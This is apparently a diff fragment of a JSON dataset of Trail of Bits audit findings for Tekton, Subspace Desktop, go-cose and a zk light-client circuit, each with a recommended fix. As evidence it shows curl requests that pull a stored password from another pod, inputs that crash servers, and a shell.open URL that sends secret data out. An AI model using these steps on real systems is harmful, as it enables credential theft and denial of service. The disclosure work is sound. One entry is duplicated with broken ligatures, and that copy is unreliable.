/workspace # cd /tekton/ /tekton # ls bin creds downward home scripts steps termination results run mytest Figure 4.3: Logging into the task pod container, we can now list the mytest directory inside of /tekton. Recommendations Short term, modify the code so that it converts the mountPath string into a file path and uses a function such as filepath.Clean to sanitize and canonicalize it before validating it.
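A sketch of the recommended sanitization; isReservedMount is a hypothetical helper, and the real check would replace the strings.HasPrefix logic in figure 4.1:

package validation

import (
	"path/filepath"
	"strings"
)

// isReservedMount canonicalizes the mount path before the prefix check, so
// a traversal string like "/certs/client/../../../tekton/mytest" is first
// reduced to "/tekton/mytest" and then correctly rejected.
func isReservedMount(mountPath string) bool {
	clean := filepath.Clean(mountPath)
	return strings.HasPrefix(clean, "/tekton/") && !strings.HasPrefix(clean, "/tekton/home")
}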
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "7. Insufficient security hardening of step containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Containers used for running task and pipeline steps have excessive security context options enabled. This increases the attack surface of the system, and issues such as Linux kernel bugs may allow attackers to escape a container if they gain code execution within a Tekton container. The figure below shows the security properties of a task container with the docker driver. # cat /proc/self/status | egrep 'Name|Uid|Gid|Groups|Cap|NoNewPrivs|Seccomp' Name: cat Uid: 0 0 0 0 Gid: 0 0 0 0 Groups: 0 CapInh: 00000000a80425fb CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 NoNewPrivs: 0 Seccomp: 0 Seccomp_filters: 0 Figure 7.1: The security properties of one of the step containers Exploit Scenario Eve finds a bug that allows her to run arbitrary code on behalf of a confined process within a container, using it to gain more privileges in the container and then to attack the host. Recommendations Short term, drop default capabilities from containers and prevent processes from gaining additional privileges by setting the --cap-drop=ALL and --security-opt=no-new-privileges:true flags when starting containers. Long term, review and implement the Kubernetes security recommendations in appendix C.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "8. Tekton allows users to create privileged containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton allows users to define task and sidecar objects with a privileged security context, which effectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insufficient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun definition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in figure 8.1, it is now possible to write to several files in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to define a privileged security context for step containers, and include guidance on how to restrict such a feature.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "9. Insufficient default network access controls between pods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "By default, containers deployed as part of task steps do not have any egress or ingress network restrictions. As a result, containers could reach services exposed over the network from any task step container. For instance, in figure 9.2, a user logs into a container running a task step in the developer-group namespace and successfully makes a request to a service in a step container in the qa-group namespace.
root@build-push-secret-35-pod:/# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.17.0.17 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:11 txqueuelen 0 (Ethernet) RX packets 21831 bytes 32563599 (32.5 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6465 bytes 362926 (362.9 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@build-push-secret-35-pod:/# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 172.17.0.16 - - [08/Mar/2022 01:03:50] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - 172.17.0.16 - - [08/Mar/2022 01:04:05] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - Figure 9.1: Exposing a simple server in a step container in the developer-group namespace root@build-push-secret-35-pod:/# curl 172.17.0.17:8000/tekton/creds-secrets/basic-user-pass-canary/password mySUPERsecretPassword Figure 9.2: Reaching the service exposed in figure 9.1 from another container in the qa-group namespace Exploit Scenario An attacker launches a malicious task container that reaches a service exposed via a sidecar container and performs unauthorized actions against the service. Recommendations Short term, enforce ingress and egress restrictions to allow only resources that need to speak to each other to do so. Leverage allowlists instead of denylists to ensure that only expected components can establish these connections. Long term, ensure the use of appropriate methods of isolation to prevent lateral movement.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "13. Nil dereferences in the trigger interceptor logic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Process functions, which are responsible for executing the various triggers for the git, gitlab, bitbucket, and cel interceptors, do not properly validate request objects, leading to nil dereference panics when requests are submitted without a Context object. func (w *Interceptor) Process(ctx context.Context, r *triggersv1.InterceptorRequest) *triggersv1.InterceptorResponse { headers := interceptors.Canonical(r.Header) // (...) // Next validate secrets if p.SecretRef != nil { // Check the secret to see if it is empty if p.SecretRef.SecretKey == \"\" { return interceptors.Fail(codes.FailedPrecondition, \"github interceptor secretRef.secretKey is empty\") } // (...) ns, _ := triggersv1.ParseTriggerID(r.Context.TriggerID) Figure 13.1: triggers/pkg/interceptors/github/github.go#L48-L85 We tested the panic by forwarding the Tekton Triggers webhook server to localhost and sending HTTP requests to the GitHub endpoint. The Go HTTP server recovers from the panic.
curl -i -s -k -X $'POST' \\ -H $'Host: 127.0.0.1:1934' -H $'Content-Length: 178' \\ --data-binary $'{\\x0d\\x0a\\\"header\\\":{\\x0d\\x0a\\\"X-Hub-Signature\\\":[\\x0d\\x0a\\x09\\\"sig\\\"\\x0d\\x0a],\\x0d\\x0a\\\"X-GitHub-Event\\\":[\\x0d\\x0a\\\"evil\\\"\\x0d\\x0a]\\x0d\\x0a},\\x0d\\x0a\\\"interceptor_params\\\": {\\x0d\\x0a\\x09\\\"secretRef\\\": {\\x0d\\x0a\\x09\\x09\\\"secretKey\\\":\\\"key\\\",\\x0d\\x0a\\x09\\x09\\\"secretName\\\":\\\"name\\\"\\x0d\\x0a\\x09}\\x0d\\x0a}\\x0d\\x0a}' \\ $'http://127.0.0.1:1934/github' Figure 13.2: The curl request that causes a panic 2022/03/08 05:34:13 http: panic serving 127.0.0.1:49304: runtime error: invalid memory address or nil pointer dereference goroutine 33372 [running]: net/http.(*conn).serve.func1(0xc0001bf0e0) net/http/server.go:1824 +0x153 panic(0x1c25340, 0x30d6060) runtime/panic.go:971 +0x499 github.com/tektoncd/triggers/pkg/interceptors/github.(*Interceptor).Process(0xc00000d248, 0x216fec8, 0xc0003d5020, 0xc0002b7b60, 0xc0000a7978) github.com/tektoncd/triggers/pkg/interceptors/github/github.go:85 +0x1f5 github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ExecuteInterceptor(0xc000491490, 0xc000280200, 0x0, 0x0, 0x0, 0x0, 0x0) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:128 +0x5df github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ServeHTTP(0xc000491490, 0x2166dc0, 0xc0000d42a0, 0xc000280200) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:57 +0x4d net/http.(*ServeMux).ServeHTTP(0xc00042d000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2448 +0x1ad net/http.serverHandler.ServeHTTP(0xc0000d4000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2887 +0xa3 net/http.(*conn).serve(0xc0001bf0e0, 0x216ff00, 0xc00042d200) net/http/server.go:1952 +0x8cd created by net/http.(*Server).Serve net/http/server.go:3013 +0x39b Figure 13.3: Panic trace Exploit Scenario As the codebase continues to grow, a new mechanism is added to call one of the Process functions without relying on HTTP requests (for instance, via a custom RPC client implementation). An attacker uses this mechanism to create a new interceptor. He calls the Process function with an invalid object, causing a panic that crashes the Tekton Triggers webhook server. Recommendations Short term, add checks to verify that request Context objects are not nil before dereferencing them.
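A self-contained sketch of the recommended guard; the types below are simplified, hypothetical stand-ins for the triggersv1 request types shown in figure 13.1:

package interceptors

import "errors"

// TriggerContext and InterceptorRequest are simplified stand-ins for the
// real triggersv1 types.
type TriggerContext struct{ TriggerID string }

type InterceptorRequest struct {
	Header  map[string][]string
	Context *TriggerContext
}

// validateRequest rejects a request before any dereference such as
// r.Context.TriggerID can panic on a nil Context.
func validateRequest(r *InterceptorRequest) error {
	if r == nil || r.Context == nil {
		return errors.New("interceptor request is missing its context")
	}
	return nil
}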
{ \"plot\" : { \"location\" : \"/.local/share/subspace-desktop/plots\" , \"sizeGB\" : 1 }, \"rewardAddress\" : \"stC2Mgq\" , \"launchOnBoot\" : true , \"version\" : \"0.6.11\" , \"nodeName\" : \"agreeable-toothbrush-4936\" } Figure 1.2: An example of a conguration le Exploit Scenario An attacker controls a Linux user who belongs to the victims user group. Because every member of the user group is able to write to the victims conguration le, the attacker is able to change the rewardAddress eld of the le to an address she controls. As a result, she starts receiving the victims farming rewards. Recommendations Short term, change the conguration les permissions so that only its owner can read and write to it. This will prevent unauthorized users from reading and modifying the le. Additionally, create a centralized function that creates the conguration le; currently, the le is created by code in multiple places in the codebase. Long term, create tests to ensure that the conguration le is created with the correct permissions. 2. Insu\u0000cient validation of users reward addresses Severity: Low Diculty: Medium Type: Data Validation Finding ID: TOB-SPDF-2 Target: subspace-desktop/src/pages/ImportKey.vue", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. Improper error handling ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The front end code handles errors incorrectly in the following cases: The Linux auto launcher function createAutostartDir does not return an error if it fails to create the autostart directory. The Linux auto launcher function enable does not return an error if it fails to create the autostart le. The Linux auto launcher function disable does not return an error if it fails to remove the autostart le. The Linux auto launcher function isEnabled always returns true , even if it fails to read the autostart le, which indicates that the auto launcher is disabled. The exportLogs function does not display error messages to users when errors occur. Instead, it silently fails. If rewardAddress is not set, the startFarming function sends an error log to the back end but not to the front end. Despite the error, the function still tries to start farming without a reward address, causing the back end to error out. Without an error message displayed in the front end, the source of the failure is unclear. The Config::init function does not show users an error message if it fails to create the conguration directory. The Config::write function does not show users an error message if it fails to create the conguration directory, and it proceeds to try to write to the nonexistent conguration le. Additionally, it does not show an error message if it fails to write to the conguration le in its call to writeFile . The removePlot function does not return an error if it fails to delete the plots directory. The createPlotDir function does not return an error if it fails to create the plots folder (e.g., if the given user does not have the permissions necessary to create the folder in that directory). This will cause the startPlotting function to fail silently; without an error message, the user cannot know the source of the failure. The createAutostartDir function logs an error unnecessarily. 
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. Improper error handling ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The front end code handles errors incorrectly in the following cases: The Linux auto launcher function createAutostartDir does not return an error if it fails to create the autostart directory. The Linux auto launcher function enable does not return an error if it fails to create the autostart file. The Linux auto launcher function disable does not return an error if it fails to remove the autostart file. The Linux auto launcher function isEnabled always returns true, even if it fails to read the autostart file, which indicates that the auto launcher is disabled. The exportLogs function does not display error messages to users when errors occur. Instead, it silently fails. If rewardAddress is not set, the startFarming function sends an error log to the back end but not to the front end. Despite the error, the function still tries to start farming without a reward address, causing the back end to error out. Without an error message displayed in the front end, the source of the failure is unclear. The Config::init function does not show users an error message if it fails to create the configuration directory. The Config::write function does not show users an error message if it fails to create the configuration directory, and it proceeds to try to write to the nonexistent configuration file. Additionally, it does not show an error message if it fails to write to the configuration file in its call to writeFile. The removePlot function does not return an error if it fails to delete the plots directory. The createPlotDir function does not return an error if it fails to create the plots folder (e.g., if the given user does not have the permissions necessary to create the folder in that directory). This will cause the startPlotting function to fail silently; without an error message, the user cannot know the source of the failure. The createAutostartDir function logs an error unnecessarily. The function determines whether a directory exists by calling the readDir function; however, even though occasionally the directory may not be found (as expected), the function always logs an error if it is not found. Exploit Scenario To store his plots, a user chooses a directory that he does not have the permissions necessary to write to. The program fails but does not display a clear error message with the reason for the failure. The user cannot understand the problem, becomes frustrated, and deletes the application. Recommendations Short term, modify the code in the locations described above to handle errors consistently and to display messages with clear reasons for the errors in the UI. This will make the code more reliable and reduce the likelihood that users will face obstacles when using the Subspace Desktop application. Long term, write tests that trigger all possible error conditions and check that all errors are handled gracefully and are accompanied by error messages displayed to the user where relevant. This will prevent regressions during the development process.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "4. Flawed regex in the Tauri configuration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The Tauri configuration that limits which files the front end can open with the system's default applications is flawed. As shown in figure 4.1, the configuration file uses the [/subspace\\\\-desktop/] regex; the Subspace developers intended this regex to match file names that include the /subspace-desktop/ string, but the regex actually matches any string that has a single character inside the regex's square brackets. \"shell\" : { \"all\" : true , \"execute\" : true , \"open\" : \"[/subspace\\\\-desktop/]\" , \"scope\" : [ { \"name\" : \"run-osascript\" , \"cmd\" : \"osascript\" , \"args\" : true } ] }, Figure 4.1: subspace-desktop/src-tauri/tauri.conf.json#L81-L92 For example, tauri.shell.open(\"s\") is accepted as a valid location because s is inside the regex's square brackets. Contrarily, tauri.shell.open(\"z\") is an invalid location because z is not inside the square brackets. Besides opening files, in Linux, the tauri.shell.open function will handle anything that the xdg-open command handles. For example, tauri.shell.open(\"apt://firefox\") shows users a prompt to install Firefox. Attackers could also use the tauri.shell.open function to make arbitrary HTTP requests and bypass the CSP's connect-src directive with calls such as tauri.shell.open(\"https:///?secret_data=\") . Exploit Scenario An attacker finds a cross-site scripting (XSS) vulnerability in the Subspace Desktop front end. He uses the XSS vulnerability to open an arbitrary URL protocol with the exploit described above and gains the ability to remotely execute code on the user's machine. For examples of how common URL protocol handlers can lead to remote code execution attacks, refer to the vulnerabilities in the Steam and Visual Studio Code URL protocols. Recommendations Short term, revise the regex so that the front end can open only file: URLs that are within the Subspace Desktop application's logs folder. Alternatively, have the Rust back end serve these files and disallow the front end from accessing any files (see issue TOB-SPDF-5 for a more complete architectural recommendation).
Long term, write positive and negative tests that check the developers' assumptions related to the Tauri configuration.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "6. Vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The Subspace Desktop Tauri application uses vulnerable Rust and Node dependencies, as reported by the cargo audit and yarn audit tools. Among the Rust crates used in the Tauri application, two are vulnerable, three are unmaintained, and six are yanked. The table below summarizes the findings (crate / version in use / finding / latest safe version): owning_ref 0.4.1, memory corruption vulnerability (RUSTSEC-2022-0040), no safe version available; time 0.1.43, memory corruption vulnerability (RUSTSEC-2020-0071), 0.2.23 and newer; ansi_term 0.12.1, unmaintained crate (RUSTSEC-2021-0139), multiple alternatives; dotenv 0.15.0, unmaintained crate (RUSTSEC-2021-0141), dotenvy; xml-rs 0.8.4, unmaintained crate (RUSTSEC-2022-0048), quick-xml; blake2 0.10.2, yanked crate, 0.10.4; block-buffer 0.10.0, yanked crate, 0.10.3; cpufeatures 0.2.1, yanked crate, 0.2.5; iana-time-zone 0.1.44, yanked crate, 0.1.50; sp-version 5.0. For the Node dependencies used in the Tauri application, one is vulnerable to a high-severity issue and another is vulnerable to a moderate-severity issue. These vulnerable dependencies appear to be used only in the development dependencies. Package / finding / latest safe version: got, CVE-2022-33987 (moderate severity), 11.8.5 and newer; git-clone, CVE-2022-25900 (high severity), not available. Exploit Scenario An attacker finds a way to exploit a known memory corruption vulnerability in one of the dependencies reported above and takes control of the application. Recommendations Short term, update the dependencies to their newest possible versions. Work with the library authors to update the indirect dependencies. Monitor the development of the fix for owning_ref and upgrade it as soon as a safe version of the crate becomes available. Long term, run cargo audit and yarn audit regularly. Include cargo audit and yarn audit in the project's CI/CD pipeline to ensure that the team is aware of new vulnerabilities in the dependencies.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "7. Broken error reporting link ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The create_full_client function calls the sp_panic_handler::set() function to set a URL for a Discord invitation; however, this invitation is broken. The documentation for the sp_panic_handler::set() function states that the bug_url parameter is an invitation for users to visit that URL to submit a bug report in the case where a panic happens. Because the link is broken, users cannot submit bug reports. sp_panic_handler::set( \" https://discord.gg/vhKF9w3x \" , env! ( \"SUBSTRATE_CLI_IMPL_VERSION\" ), ); Figure 7.1: subspace-desktop/src-tauri/src/node.rs#L169-L172 Exploit Scenario A user encounters a crash of Subspace Desktop and is presented with a broken link with which to report the error.
The user is unable to report the error. Recommendations Short term, update the bug report link to the correct Discord invitation. Long term, use a URL on a domain controlled by Subspace Network as the bug reporting URL. This will allow Subspace Network developers to make adjustments to the reporting URL without pushing application updates.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9. Network configuration path construction is duplicated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The create_full_client function contains code that uses hard-coded strings to indicate configuration paths (figure 9.1) in place of the previously defined DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values, which are used in the other parts of the code. This is a risky coding pattern, as a Subspace developer who is updating the DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values may forget to also update the equivalent values used in the create_full_client function. if primary_chain_node.client.info().best_number == 33670 { if let Some (config_dir) = config_dir { let workaround_file = config_dir.join( \"network\" ).join( \"gemini_1b_workaround\" ); if !workaround_file.exists() { let _ = std::fs::write(workaround_file, &[]); let _ = std::fs::remove_file( config_dir.join( \"network\" ).join( \"secret_ed25519\" ) ); return Err (anyhow!( \"Applied workaround for upgrade from gemini-1b-2022-jun-08, \\ please restart this node\" )); } } } Figure 9.1: subspace-desktop/src-tauri/src/node.rs#L207-L219 Recommendations Short term, update the code in figure 9.1 to use DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE rather than the hard-coded values. This will make eventual updates to these paths less error prone.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Unmarshalling can cause a panic if any header labels are unhashable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "The ensureCritical function checks that all critical labels exist in the protected header. The check for each label is shown in Figure 1.1. 161 if _, ok := h[label]; !ok { Figure 1.1: Line 161 of headers.go The label in this case is deserialized from the user's CBOR input. If the label is a non-hashable type (e.g., a slice or a map), then Go will panic at runtime on line 161. Exploit Scenario Alice wishes to crash a server running go-cose. She sends the following CBOR message to the server: \\xd2\\x84G\\xc2\\xa1\\x02\\xc2\\x84@0000C000C000. When the server attempts to validate the critical headers during unmarshalling, it panics on line 161. Recommendations Short term, add a validation step to ensure that the elements of the critical header are valid labels. Long term, integrate go-cose's existing fuzz tests into the CI pipeline. Although this bug was not discovered using go-cose's preexisting fuzz tests, the tests likely would have discovered it if they ran for enough time. Fix Analysis This issue has been resolved. Pull request #78, committed to the main branch in b870a00b4a0455ab5c3da1902570021e2bac12da, adds validations to ensure that critical headers are only integers or strings.
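The fix constrains labels to integers and strings; a minimal Go sketch of that shape of validation follows (validLabel is a hypothetical helper, not the actual go-cose patch):

package cose

import "fmt"

// validLabel accepts only the CBOR label types permitted by RFC 8152
// (integers and text strings); any other decoded type, such as a slice or
// map, is rejected before it can be used as a map key and cause a panic.
func validLabel(label any) error {
	switch label.(type) {
	case int, int64, uint64, string:
		return nil
	default:
		return fmt.Errorf("header label has unhashable or invalid type %T", label)
	}
}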
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. crit label is permitted in unvalidated headers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "The crit header parameter identifies which header labels must be understood by an application receiving the COSE message. Per RFC 8152, this value must be placed in the protected header bucket, which is authenticated by the message signature. Figure 2.1: Excerpt from RFC 8152 section 3.1 Currently, the implementation ensures during marshaling and unmarshaling that if the crit parameter is present in the protected header, then all indicated labels are also present in the protected header. However, the implementation does not ensure that the crit parameter is not present in the unprotected bucket. If a user mistakenly uses the unprotected header for the crit parameter, then other conforming COSE implementations may reject the message and the message may be exposed to tampering. Exploit Scenario A library user mistakenly places the crit label in the unprotected header, allowing an adversary to manipulate the meaning of the message by adding, removing, or changing the set of critical headers. Recommendations Add a check during ensureCritical to verify that the crit label is not present in the unprotected header bucket. Fix Analysis This issue has been resolved. Pull request #81, committed to the main branch in 62383c287782d0ba5a6f82f984da0b841e434298, adds validations to ensure that the crit label is not present in unprotected headers.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "3. Generic COSE header types are not validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "Section 3.1 of RFC 8152 defines a number of common COSE header parameters and their associated value types. Applications using the go-cose library may rely on COSE-defined headers decoded by the library to be of a specified type. For example, the COSE specification defines the content-type header (label #3) as one of two types: a text string or an unsigned integer. The go-cose library validates only the alg and crit parameters, not content-type. See Figure 3.1 for a list of defined header types. Figure 3.1: RFC 8152 Section 3.1, Table 2 Further header types are defined by the IANA COSE Header Parameter Registry. Exploit Scenario An application uses go-cose to verify and validate incoming COSE messages. The application uses the content-type header to index a map, expecting the content type to be a valid string or integer. An attacker could, however, supply an unhashable value, causing the application to panic. Recommendations Short term, explicitly document which IANA-defined headers or label ranges are and are not validated. Long term, validate commonly used headers for type and semantic consistency. For example, once counter signatures are implemented, the counter-signature (label #7) header should be validated for well-formedness during unmarshalling.
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "1. Prover can lock user funds by including ill-formed BigInts in public key commitment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The Rotate circuit does not check for the validity of BigInts included in pubkeysBigIntY . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. The Rotate circuit is designed to prove a translation between an SSZ commitment over a set of validator public keys produced by the Ethereum consensus protocol and a Poseidon commitment over an equivalent list. The SSZ commitment is over public keys serialized as 48-byte compressed BLS public keys, specifying an X coordinate and single sign bit, while the Poseidon commitment is over pairs (X, Y) , where X and Y are 7-limb, 55-bit BigInts. The prover specifies the Y coordinate for each public key as part of the witness; the Rotate circuit then uses SubgroupCheckG1WithValidX to constrain Y to be valid in the sense that (X, Y) is a point on the BLS12-381 elliptic curve. However, SubgroupCheckG1WithValidX assumes that its input is a properly formed BigInt, with all limbs less than 2^55. This property is not validated anywhere in the Rotate circuit. By committing to a Poseidon root containing invalid BigInts, a malicious prover can prevent other provers from successfully proving a Step operation, bringing the light client to a halt and causing user funds to be stuck in the bridge. Furthermore, the invalid elliptic curve points would then be usable in the Step circuit, where they are passed without validation to the EllipticCurveAddUnequal function. The behavior of this function on ill-formed inputs is not specified and could allow a malicious prover to forge Step proofs without a valid sync committee signature. Figure 1.1 shows where the untrusted pubkeysBigIntY value is passed to the SubgroupCheckG1WithValidX template. /* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */ component isValidPoint[SYNC_COMMITTEE_SIZE]; for ( var i = 0 ; i < SYNC_COMMITTEE_SIZE; i++) { isValidPoint[i] = SubgroupCheckG1WithValidX(N, K); for ( var j = 0 ; j < K; j++) { isValidPoint[i]. in [ 0 ][j] <== pubkeysBigIntX[i][j]; isValidPoint[i]. in [ 1 ][j] <== pubkeysBigIntY[i][j]; } } Figure 1.1: telepathy/circuits/circuits/rotate.circom#101-109 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. Instead of using correctly formatted BigInts to represent the Y values of each public key point, she modifies the value by subtracting one from the most significant limb and adding 2^55 to the second-most significant limb. She then posts the resulting proof to the LightClient contract via the rotate function, which updates the sync committee commitment to Alice's Poseidon commitment containing ill-formed Y coordinates. Future provers would then be unable to use the default witness generator to make new proofs, locking user funds in the bridge. Alice may be able to then exploit invalid assumptions in the Step circuit to forge Step proofs and steal bridge funds.
Recommendations Short term, use a Num2Bits component to verify that each limb of the pubkeysBigIntY witness value is less than 2^55. Long term, clearly document and validate the input assumptions of templates such as SubgroupCheckG1WithValidX . Consider adopting Circom signal tags to automate the checking of these assumptions.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. Prover can lock user funds by supplying non-reduced Y values to G1BigIntToSignFlag ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The G1BigIntToSignFlag template does not check whether its input is a value properly reduced mod p . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. During the Rotate proof, when translating compressed public keys to full (X, Y) form, the prover must supply a Y value with a sign corresponding to the sign bit of the compressed public key. The circuit calculates the sign of Y by passing the Y coordinate (supplied by the prover and represented as a BigInt) to the G1BigIntToSignFlag component (figure 2.1). This component determines the sign of Y by checking if 2*Y >= p . However, the correctness of this calculation depends on the Y value being less than p ; otherwise, a positive, non-reduced value such as p + 1 will be incorrectly interpreted as negative. A malicious prover could use this fact to commit to a non-reduced form of Y that differs in sign from the correct public key. This invalid commitment would prevent future provers from generating Step circuit proofs and thus halt the LightClient , trapping user funds in the Bridge . template G1BigIntToSignFlag(N, K) { signal input in [K]; signal output out; var P[K] = getBLS128381Prime(); var LOG_K = log_ceil(K); component mul = BigMult(N, K); signal two[K]; for ( var i = 0 ; i < K; i++) { if (i == 0 ) { two[i] <== 2 ; } else { two[i] <== 0 ; } } for ( var i = 0 ; i < K; i++) { mul.a[i] <== in [i]; mul.b[i] <== two[i]; } component lt = BigLessThan(N, K); for ( var i = 0 ; i < K; i++) { lt.a[i] <== mul.out[i]; lt.b[i] <== P[i]; } out <== 1 - lt.out; } Figure 2.1: telepathy/circuits/circuits/bls.circom#197-226 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. When one of the new sync committee members' public key Y values has a negative sign, Alice substitutes it with 2P - Y . This value is congruent to -Y mod p , and thus has positive sign; however, the G1BigIntToSignFlag component will determine that it has negative sign and validate the inclusion in the Poseidon commitment. Future provers will then be unable to generate proofs from this commitment since the committed public key set does not match the canonical sync committee. Recommendations Short term, constrain the pubkeysBigIntY values to be less than p using BigLessThan . Long term, constrain all private witness values to be in canonical form before use. Consider adopting Circom signal tags to automate the checking of these assumptions.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "3. 
